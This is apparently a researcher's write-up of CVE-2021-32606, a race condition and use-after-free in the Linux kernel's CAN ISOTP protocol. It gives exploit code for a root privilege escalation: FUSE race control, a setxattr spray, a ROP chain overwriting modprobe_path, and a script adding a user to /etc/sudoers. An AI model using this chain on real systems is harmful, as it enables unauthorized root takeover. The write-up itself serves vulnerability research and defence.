# CVE-2021-32606: CAN ISOTP local privilege escalation

This article is about a recent vulnerability in the linux kernel labeled *CVE-2021-32606*. The
vulnerable part of the kernel was the ISOTP CAN networking protocol in the CAN networking
subsystem. In the following, I am going to cover the vulnerability and my exploitation
approach which led to successful local privilege escalation to root.

## Vulnerability 

The vulnerability is a race condition which allowed to modify socket options after the socket was
bound. For this reason, the race condition occurs between `isotp_setsockopt()` and `isotp_bind()`.
In the case of the CAN ISOTP protocol, if socket options other than default shall be used,
the new socket options have to be accordingly set with `isotp_setsockopt()` before binding the socket.
Especially with the introduction of CAN_ISOTP_SF_BROADCAST support in commit ``921ca574cd38``, no
further change of socket options is allowed, as this might result in other socket behavior than
previously expected.

Every ISOTP socket has the following ``struct can_isotp_options`` which can be changed
with `isotp_setsockopt()`.

```c
struct can_isotp_options {
        __u32 flags;            /* set flags for isotp behaviour.       */
	...
```

When an ISOTP socket is about to be bound in `isotp_bind()`, the `flags` are checked against
``CAN_ISOTP_SF_BROADCAST``. In case ``CAN_ISOTP_SF_BROADCAST`` is set, no CAN receiver will be
registered. A CAN receiver is a feature which will be automatically run as a software interrupt in
order to receive incoming CAN messages.

```c
static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
	...
	/* do not register frame reception for functional addressing */
	if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
		do_rx_reg = 0;
	...
	if (do_rx_reg)
		can_rx_register(net, dev, addr->can_addr.tp.rx_id,
				SINGLE_MASK(addr->can_addr.tp.rx_id),
				isotp_rcv, sk, "isotp", sk);
	...
	so->bound = 1;
	...
```

Above in `isotp_bind()`, we can see that `can_rx_register()` won't be called if
``CAN_ISOTP_SF_BROADCAST`` is not set. In `isotp_setsockopt()`, we can either set or remove this flag.

The following excerpt shows `isotp_setsockopt()` from `net/can/isotp.c`
```c
static int isotp_setsockopt(struct socket *sock, int level, int optname,
			    sockptr_t optval, unsigned int optlen)
{
	struct sock *sk = sock->sk;
	struct isotp_sock *so = isotp_sk(sk);
	int ret = 0;

	if (level != SOL_CAN_ISOTP)
		return -EINVAL;

	if (so->bound)							[1]
		return -EISCONN;

	switch (optname) {
	case CAN_ISOTP_OPTS:
		if (optlen != sizeof(struct can_isotp_options))
			return -EINVAL;

		if (copy_from_sockptr(&so->opt, optval, optlen))	[2]
			return -EFAULT;
		break;
	...
```

If the socket is already bound ``[1]``, we return from the function earlier, as we cannot modify the
socket options of a bound socket.
In case the socket is not bound, ``struct can_isotp_options`` will be copied ``[2]`` from user space.

Now consider the following race condition between `isotp_setsockopt()` and `isotp_bind()`:

- `isotp_setsockopt()` is called and we pass the check at ``[1]`` since the socket is unbound.

- `isotp_bind()` is by default called without ``CAN_ISOTP_SF_BROADCAST``, resulting in the
  registration of a CAN receiver. In the end, ``so->bound`` will be set to ``1``.

- The socket was just bound but we are still in `isotp_setsockopt()`. If the timing is right, we will
  change ``struct can_isotp_options`` with `flags` set to ``CAN_ISOTP_SF_BROADCAST``. Notice that the copy
  ``[2]`` will happen on an already bound socket.

At this place, we now have a socket with a registered CAN receiver, but according to its newly
set `flags` to ``CAN_ISOTP_SF_BROADCAST``, this shouldn't have happened.

After a successful race condition, we now close the socket and `isotp_release()` is called.

```c
static int isotp_release(struct socket *sock)
{
	...

	/* remove current filters & unregister */
	if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) {		[1]
		if (so->ifindex) {
			struct net_device *dev;

			dev = dev_get_by_index(net, so->ifindex);
			if (dev) {
				can_rx_unregister(net, dev, so->rxid,		[2]
						  SINGLE_MASK(so->rxid),
						  isotp_rcv, sk);
				dev_put(dev);
			}
		}
	}

	...
```

The check at ``[1]`` assures that the CAN receiver will be unregistered if `flags` weren't set to
``CAN_ISOTP_SF_BROADCAST``.
But because we illegally changed `flags` after binding the socket, it is now assumed that we
didn't register a CAN receiver so none will be unregistered.

At this place, we now have closed the ISOTP socket, but we still have a registered CAN receiver.
In case another socket sends messages to our previously freed socket, a softirq will call `isotp_rcv()`
on the freed ``struct isotp_sock``, resulting in **use-after-free**.

## Exploitation 

In order to allow successful exploitation, the following conditions are required:

- The kernel needs to come with config option ``CONFIG_USER_NS`` enabled. This option is needed to
  set up a sandbox for the unprivileged user, allowing to autoload VCAN and ISOTP modules.
  The first is needed to set up a CAN networking device for our ISOTP sockets, and the latter is
  needed to create the aforesaid sockets.

- An infoleak is needed in order to bypass KASLR and to get the address of the GS register. The
  usage of the latter will be explained soon. In my case, I could trigger a kernel warning which
  would effectively display the Oops message in kernel logs. Kernel logs can be read on
  distributions which haven't restricted access to dmesg via ``CONFIG_SECURITY_DMESG_RESTRICT``.

Exploitation is possible on machines with **SMEP**, **SMAP**, **KASLR** and **KPTI** enabled.

### FUSE technique

For this particular exploit, I originally wanted to use the userfault technique to reliably
control the race condition. Due to userfault being recently disabled, I looked for other
possibilities and stumbled upon a technique which was used by *Jann Horn* to control a race condition,
in the past. I think because of userfault working well in the past, this technique might have not
been frequently used as much, but it's still a worthy approach to make this particular exploit reliable.

One of the drawbacks of the FUSE technique I see is that it might not come preinstalled on some
distributions. On OpenSUSE Tumbleweed with XFCE desktop FUSE came preinstalled and was accessible
to unprivileged users.
Repeated tests have shown, that there is still a good chance to exploit this
vulnerability **without** FUSE or userfault, but the reliability would potentially be decreased.

In short, **FUSE** stands for **Filesystem in Userspace** and allows to mount self-made filesystems in a
user-controlled directory. For this exploit, I used a template filesystem from libfuse called
``hello` which was modified to be effectively used in this exploit.

The following excerpt shows the `hello_read()` function from the hello filesystem
```c
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
                struct fuse_file_info *fi)
{
        /* wait inside isotp_setsockopt() */
        sleep(2);						

        int flags = CAN_ISOTP_SF_BROADCAST;
        struct can_isotp_options opts;
        size_t len = sizeof(opts);

        memset(&opts, 0, sizeof(opts));
        opts.flags = flags;

        if (offset < len) {
                if (offset + size > len)
                        size = len - offset;
                memcpy(buf, &opts + offset, size);
        } else {
                size = 0;
        }

        return size;
}
```

In this case, any read associated with the hello filesystem will be redirected to `hello_read()`.
Inside `hello_read()`, we `sleep()` for 2 seconds, effectively halting the kernel execution at
`copy_from_sockptr()` in `isotp_setsockopt()`.
```c
	if (copy_from_sockptr(&so->opt, optval, optlen))
		return -EFAULT;
```

In the meanwhile, `isotp_bind()` will finish and bind the socket, finally setting ``so->bound`` to ``1``.
Then, we proceed with copying flags containing ``CAN_ISOTP_SF_BROADCAST`` to the kernel space.

```c
void setup_fusefs(void)
{
        fuse_fd = open("mnt/hello", O_RDWR);				       	   [1]
        if (fuse_fd < 0)
                die("failed to open fuse fd");

        fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
				PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0);   [2]

        if (fuse_map == MAP_FAILED)
                die("failed to map with fuse fs");
}
```

In my exploit, I get a fd of the filesystem ``[1]`` and mmap memory ``[2]`` similarly to userfault.
This `mmap()` will be associated with the previously opened ``fuse_fd``. As already mentioned,
any copy from the kernel space from this mmap'ed memory will be handled by `hello_read()`.

At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race
condition between `isotp_setsockopt()` and `isotp_bind()`.

How does the **controlled** race condition scenario look like?

- `isotp_setsockopt()` is called on an unbound socket.
	- `copy_from_sockptr()` wants to copy `struct can_isotp_options` from the user space
	- `hello_read()` is called and goes to `sleep()` for 2 seconds, kernel execution is now halted!

- while we are in `setsockopt()`, we **now call** `isotp_bind()`
	- ``CAN_ISOTP_SF_BROADCAST`` flag is **not** set, so a CAN receiver will be registered
	- return from `isotp_bind()`, the socket is now successfully bound

- during the 2 seconds `isotp_setsockopt()` was halted, we expect `isotp_bind()` to be completed
	- `memcpy()` inside `hello_read()` will now copy the struct to kernel space
	- we set the ``CAN_ISOTP_SF_BROADCAST`` flag for a bound socket!

### Further exploitation

As already mentioned, closing the socket won't unregister the CAN receiver and we cause a few
use-after-free's inside `isotp_rcv()` whenever we send a message to the freed socket.

My approach focuses on spraying the freed `struct isotp_sock` so we can reliably pass the
checks in `isotp_rcv()` and call an overwritten function pointer. Because the struct is pretty big
(on my machine it was 17432 bytes) and exceeds the biggest kmalloc cache `kmalloc-8k`,
it won't be allocated in any of the generic SLAB caches.
Instead, the page allocator will allocate it.

Looking after a feasible spray primitive, I ended up with choosing `setxattr()`. This syscall
was mainly used in combination with userfault, as `setxattr()` frees the buffer right after copying
it. In fact, we could probably hold it with FUSE, but after repeated tests I noticed that `setxattr()`
alone is also very reliable in this case. The most important thing with this approach is that `setxattr()`
does not erase the buffer after freeing it, so the previously copied bytes will remain in memory.

Theoretically, some other object could be allocated right after we sprayed the freed socket, but
in practice it does not provoke any crashes and in the worst case we can simply rerun the exploit
and try again. In the following, I will explain this further.

```c
static void isotp_rcv(struct sk_buff *skb, void *data)
{
	/* Strictly receive only frames with the configured MTU size
	 * => clear separation of CAN2.0 / CAN FD transport channels
	 */
	if (skb->len != so->ll.mtu)							[1]
		return;
	...
	switch (n_pci_type) {
	...
	case N_PCI_SF:
		/* rx path: single frame
		 *
		 * As we do not have a rx.ll_dl configuration, we can only test
		 * if the CAN frames payload length matches the LL_DL == 8
		 * requirements - no matter if it's CAN 2.0 or CAN FD
		 */

		/* get the SF_DL from the N_PCI byte */
		sf_dl = cf->data[ae] & 0x0F;

		if (cf->len <= CAN_MAX_DLEN) {
			isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl);		[2]
	...
```

In the beginning of `isotp_rcv()`, the length of the received ``sk_buff`` is checked against ``so->ll.mtu``.
The `skb->len` of the received message is by default `16`, so
``so->ll.mtu`` also has to be `16`. If this is not the case, we return from the function.
Because we control the whole ``struct isotp_sock`` with the `setxattr()` spray,
we can set ``so->ll.mtu`` to `16`. This is also why this seemingly unreliable spraying approach is
still very reliable: In case the spray will fail, it's very unlikely that `isotp_rcv()` will read
exactly `16` at the position of ``so->ll.mtu``. For any rubbish value other than `16`, we will safely
return from `isotp_rcv()` and we can try again.

After the initial check ``[1]``, `isotp_rcv_sf()` will be called ``[2]`` to receive a so-called CAN
single frame message in case the message length is <= 8.

```c
static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
			struct sk_buff *skb, int len)
{
	...
	hrtimer_cancel(&so->rxtimer);							[1]
	so->rx.state = ISOTP_IDLE;
	...
	if ((so->opt.flags & ISOTP_CHECK_PADDING) &&					[2]
	    check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
		/* malformed PDU - report 'not a data message' */
		sk->sk_err = EBADMSG;
		if (!sock_flag(sk, SOCK_DEAD))
			sk->sk_error_report(sk);					[3]
		return 1;
	}
```

At ``[1]``, one of the hrtimers is cancelled by calling `hrtimer_cancel()`. I won't cover hrtimers
in this article in detail. All you have to know is that we need to overwrite the freed socket's memory
in the place of ``so->rxtimer.base`` in order to prevent kernel crashes. ``struct hrtimer`` has a
pointer to ``struct hrtimer_clock_base``. ``hrtimer_clock_base`` is defined per CPU core.
Fortunately, the abovementioned `GS` register holds the address of one of the core's per-CPU data,
and adding a constant offset to this address will give us a valid `struct hrtimer_clock_base`.

After a couple of checks in `hrtimer_cancel()`, the socket's flags are checked ``[2]`` against
``ISOTP_CHECK_PADDING``. These flags are exactly the ones where ``CAN_ISOTP_SF_BROADCAST`` is
stored. We can provide this flag along with some other flags needed in `check_pad()`.
The combination of the user-controlled message length and the padding flags results in the message
being seen as malformed. Accordingly, the socket will call `sk_error_report()` ``[3]`` to report this issue.
Just like we can control any single byte of ``struct isotp_sock``, it's also possible to
overwrite the `sk_error_report()` pointer. At this point, we have successfully managed to achieve
**arbitrary kernel execution**.

One may ask, where are we supposed to forward the execution? Jumping to invalid places led to a
kernel panic, but then I noticed that the `RDI` register stored the address of our freed ``struct isotp_sock``. I decided to perform a stack pivot to this address and start executing ROP gadgets. In
order to take use of the ROP gadgets found in the vmlinux image, I use the leaked KASLR offset from
the warning in kernel logs.
When I assembled the ROP chain, I took into account that the space might not be enough and eventually
some important data might be overwritten. Because of that, I almost immediately moved the stack
pointer somewhere in the middle of the sprayed target where no data would explicitly be used by
`isotp_rcv()`. This is possible because of the large size of `struct isotp_sock` which makes it
feasible to place the payload inside the object.
In this example, I place my extended ROP chain at offset 0x718.

```c
	/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
	dst = (uint64_t *)(p + 0x2b8);
	*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;

	/* ROP at isotp_sock + 0x8 */
	*dst = ROP_RET_0x700 + kaslr_offset;
	dst++;
        /* jump to extended rop chain at isotp_sock + 0x10 */
        *dst = ROP_RET + kaslr_offset;

	/* extended rop chain */
        rop = (uint64_t *)(p + 0x718);
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = 0x782f706d742f; /* /tmp/x */
        *rop++ = ROP_POP_RCX__RET + kaslr_offset;
        *rop++ = MODPROBE_PATH + kaslr_offset;
        *rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = DO_TASK_DEAD + kaslr_offset;			[1]
        *rop++ = ROP_JMP_RAX + kaslr_offset;
```


The following image shows the sprayed target to overwrite `struct isotp_sock`

![alt text](https://github.com/nrb547/kernel-exploitation/blob/main/cve-2021-32606/cve-2021-32606-spray.png "sprayed target")

The ROP chain consists of a technique to overwrite `modprobe_path`. In case any user wants to execute
a file with an invalid file signature, the program at `modprobe_path` will be executed with root privileges.
This technique was apparently used in some CTF challenges and it was thoroughly described by *lkmidas*
in his blog. In case you want to learn about it in depth, check out his well-written article.
Once we have overwritten `modprobe_path`, the kernel thread will be stopped in `do_task_dead()` ``[1]``.
This step is needed as we are already done with exploiting the kernel, and any further
execution of our hijacked kernel thread might result in severe kernel crashes.

```c
ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy;		[1]
	chmod +x /tmp/dummy");
if (ret != 0)
	die("/tmp/dummy creation failed");

ret = system("echo '#!/bin/sh' > /tmp/x; \
	echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers'	[2]
		>> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
	die("/tmp/x creation failed");
```

In short, I create a file ``/tmp/dummy`` ``[1]`` with the invalid signature ``0xff 0xff 0xff 0xff``.
I also create a file ``/tmp/x`` ``[2]`` which is the overwritten `modprobe_path`. This small
shell script will add the unprivileged user to ``/etc/sudoers``, allowing to escalate the user's
privileges to root.

### Combining everything together

At this place, I covered all of the steps which now have to be combined.
The following sequence is used in my exploit:

- trigger warning to retrieve kernel addresses from kernel logs

- setup FUSE filesystem and allocate memory with `mmap()`

- setup user namespace to autoload VCAN and ISOTP modules

- setup CAN networking device with VCAN

- open ISOTP socket 1
	- this socket will be exploited with the race condition

- open ISOTP socket 2
	- this socket will only be used to send a CAN message to socket 1

- win race condition on socket 1

- close socket 1

- spray the page allocator with `setxattr()` containing our payload to overwrite socket 1

- send CAN message from socket 2 to socket 1

- `isotp_rcv()` is run as software interrupt for socket 1

- in `isotp_rcv()`, pass checks and call malicious `sk_error_report()` pointer to perform the stack
  pivot

- stack pivot leads to ROP chain execution at `struct isotp_sock`

- execute extended ROP chain, overwrite `modprobe_path`

- try executing `/tmp/dummy`, `/tmp/x` will be executed with root privileges

- the unprivileged user is now added to `/etc/sudoers` and we can now get a **root shell**

Exploit output

```
noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)
```

## Notice

Researching and exploiting the vulnerability  was a great opportunity to expand my knowledge about
the Linux kernel.
I hope you enjoyed the article. In case of further questions feel free to reach out to me by
writing me an e-mail (nslusarek@gmx.net).

Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are
interested, please reach out to me via e-mail.

## References

https://bugs.chromium.org/p/project-zero/issues/detail?id=808

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

https://www.openwall.com/lists/oss-security/2021/05/11/16